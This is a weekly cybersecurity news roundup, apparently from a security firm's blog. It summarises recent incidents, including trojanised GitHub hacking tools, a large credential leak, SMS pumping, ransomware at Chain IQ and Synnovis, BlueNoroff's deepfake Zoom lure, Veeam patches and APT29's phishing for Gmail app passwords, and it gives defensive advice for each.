This week’s roundup features a diverse range of threats, from the abuse of open-source hacking tools to innovative phishing tactics bypassing two-factor authentication.

A staggering 16 billion login credentials have been exposed in what researchers are calling one of the largest data breaches in history, raising serious concerns about credential hygiene and the widespread use of infostealer malware.

Ireland’s National Cyber Security Centre has issued a new warning on the growing threat of SMS pumping, while ransomware attacks continue to cause widespread disruption, with supply chain firm Chain IQ and NHS service provider Synnovis both falling victim—impacting data and delaying over 1,100 operations.

Meanwhile, advanced actors like BlueNoroff and APT29 are deploying deepfake lures and exploiting Gmail’s legacy access settings to infiltrate systems, and critical vulnerabilities in widely used software like Veeam are being patched under emergency advisories Veeam are being patched under emergency advisories.

New Campaigns Embed Malware in Open-Source Hacking Tools

Security firms Trend Micro and ReversingLabs have uncovered coordinated campaigns that insert malware into open-source hacking tools distributed through GitHub repositories.

The first campaign, linked to a threat actor called “Water Curse,” utilised at least 76 GitHub accounts to inject payloads into build scripts and project files, stealing credentials, browser data, session tokens and granting remote access.

A parallel campaign by “Banana Squad” compromised over 67 Python-based hacking tool repositories, disguising them as legitimate while delivering trojanised versions.

These operations exploit the trust developers place in GitHub, targeting red teams, novice cybercriminals, and online communities. Users are urged to audit third-party repo code and validate tool authenticity before use.

16 Billion Login Credentials Exposed in One of the Largest Data Breaches Ever Recorded

Cybernews researchers have uncovered 30 massive datasets totaling over 16 billion exposed login credentials, making this one of the largest credential leaks in history. The records, many harvested through infostealer malware, span platforms like Apple, Google, Facebook, GitHub, Telegram, and even government services.

Each dataset contains structured data including URLs, usernames, and passwords, and some also include tokens, cookies, and metadata. These fresh and structured logs present a critical threat, enabling cybercriminals to conduct account takeovers, phishing, ransomware attacks, and business email compromise.

Although the data was only briefly exposed via unsecured cloud storage, the sheer scale signals a growing global threat. Researchers stress that strong, unique passwords and multi-factor authentication are now more essential than ever.

NCSC Warns Businesses Against “SMS Pumping”

The National Cyber Security Centre (NCSC) has issued new guidance on preventing “SMS pumping” attacks, in which fraudsters abuse public SMS and telephone interfaces (like OTP and support numbers) to generate inflated, costly message traffic.

The NCSC emphasises that the technology underpinning mass SMS and voice services does not verify caller identity, making it easy to spoof legitimate organisations and exploit their systems.

To combat this, businesses should standardise Sender IDs, limit the number of channels and phone numbers in use, monitor traffic for spikes, set rate limits, and ensure telecom suppliers follow industry best practices. Adopting these measures helps prevent financial loss and reputational damage caused by telecom fraud.

Chain IQ Supplier Hit in Ransomware Attack

On June 12, 2025, Swiss procurement provider Chain IQ and 19 associated firms were struck by a ransomware attack linked to the WorldLeaks group, resulting in the theft of data from Chain IQ customers.

Chain IQ responded within 8 hours and 45 minutes, revoking attacker access and containing the incident, though the ransomware group claimed approximately 910 GB of stolen data—about 1.9 million files.

The breach affected employee contact details of major clients including UBS, Pictet, Manor, and Implenia; however, UBS confirmed there was no compromise of customer data.

NHS Blood Test Provider Synnovis Hit by Ransomware

On June 3, 2024, ransomware attackers breached Synnovis, a major NHS blood testing provider serving southeast London, stealing approximately 400 GB of data.

The breach exposed highly sensitive patient information, including names, dates of birth, NHS numbers, and blood test details, alongside contractual and financial documents.

More than 1,100 planned operations and 2,100 outpatient appointments were delayed, and some blood tests had to be repeated due to sample spoilage. NHS England, in coordination with Synnovis, the National Cyber Security Centre, and the National Crime Agency, is investigating the breach. A helpline has been established for impacted patients.

Health officials say urgent and emergency services remain operational, though delays in routine care persist. Affected individuals are being informed and advised to monitor their records for suspicious activity.

BlueNoroff Uses Deepfake Zoom Call to Infect Mac with macOS Backdoor Malware

The North Korea linked APT group, BlueNoroff, recently executed a sophisticated attack targeting a cryptocurrency employee using a deepfake Zoom session.

Researchers from Huntress reported that the attackers initiated contact via Telegram, sent a Calendly link that redirected victims to a fake Zoom domain, and conducted a meeting featuring AI-generated falsified company executives.

During the call, participants urged the victim to install a Zoom support extension, which turned out to be macOS malware. The malicious AppleScript, named zoom_sdk_support.scpt, downloaded a shell script that deployed the backdoor payload.

Veeam Releases Emergency Patches for Critical RCE Vulnerability in Backup and Replication

Veeam has issued a crucial update (v12.3.2 build 12.3.2.3617) to fix CVE-2025-23121, a critical remote code execution flaw (CVSS 9.9) in its Backup & Replication software that permits authenticated domain users to execute arbitrary code on backup servers.

The vulnerability affects all earlier v12 builds and the patch also addresses two additional issues, one allowing backup operators to modify jobs (CVE‑2025‑24286) and another elevating privileges on Windows agents (CVE‑2025‑24287). Discovered by CODE WHITE GmbH and watchTowr, these flaws are particularly dangerous in domain-joined environments.

With Veeam being a frequent target for ransomware gangs, administrators are urged to update immediately to prevent catastrophic backup compromises.

Russian APT29 Exploits Gmail App‑Specific Passwords to Bypass 2FA in Targeted Phishing Campaign

From April to early June 2025, Russian-linked APT29 (UNC6293) has executed a highly targeted phishing campaign against prominent academics and critics of Russia, impersonating US State Department staff.

Through weeks of rapport-building and tailored emails, attackers convinced victims to generate and share Google App-Specific Passwords—a feature intended for legacy apps—thus bypassing two-factor authentication. Once provided, attackers gained persistent access to Gmail accounts without detection. The campaign is notable for its sophistication, patience, and use of official-seeming communications across multiple addresses.

The Citizen Lab and Google Threat Intelligence Group emphasise that this approach represents a novel social-engineering tactic rather than a technical exploit. High-risk users are urged to enable Google’s Advanced Protection Program and scrutinise all app passwords.

Have questions about your cybersecurity posture? We’re here to help! Contact us using the form below to get started 👇.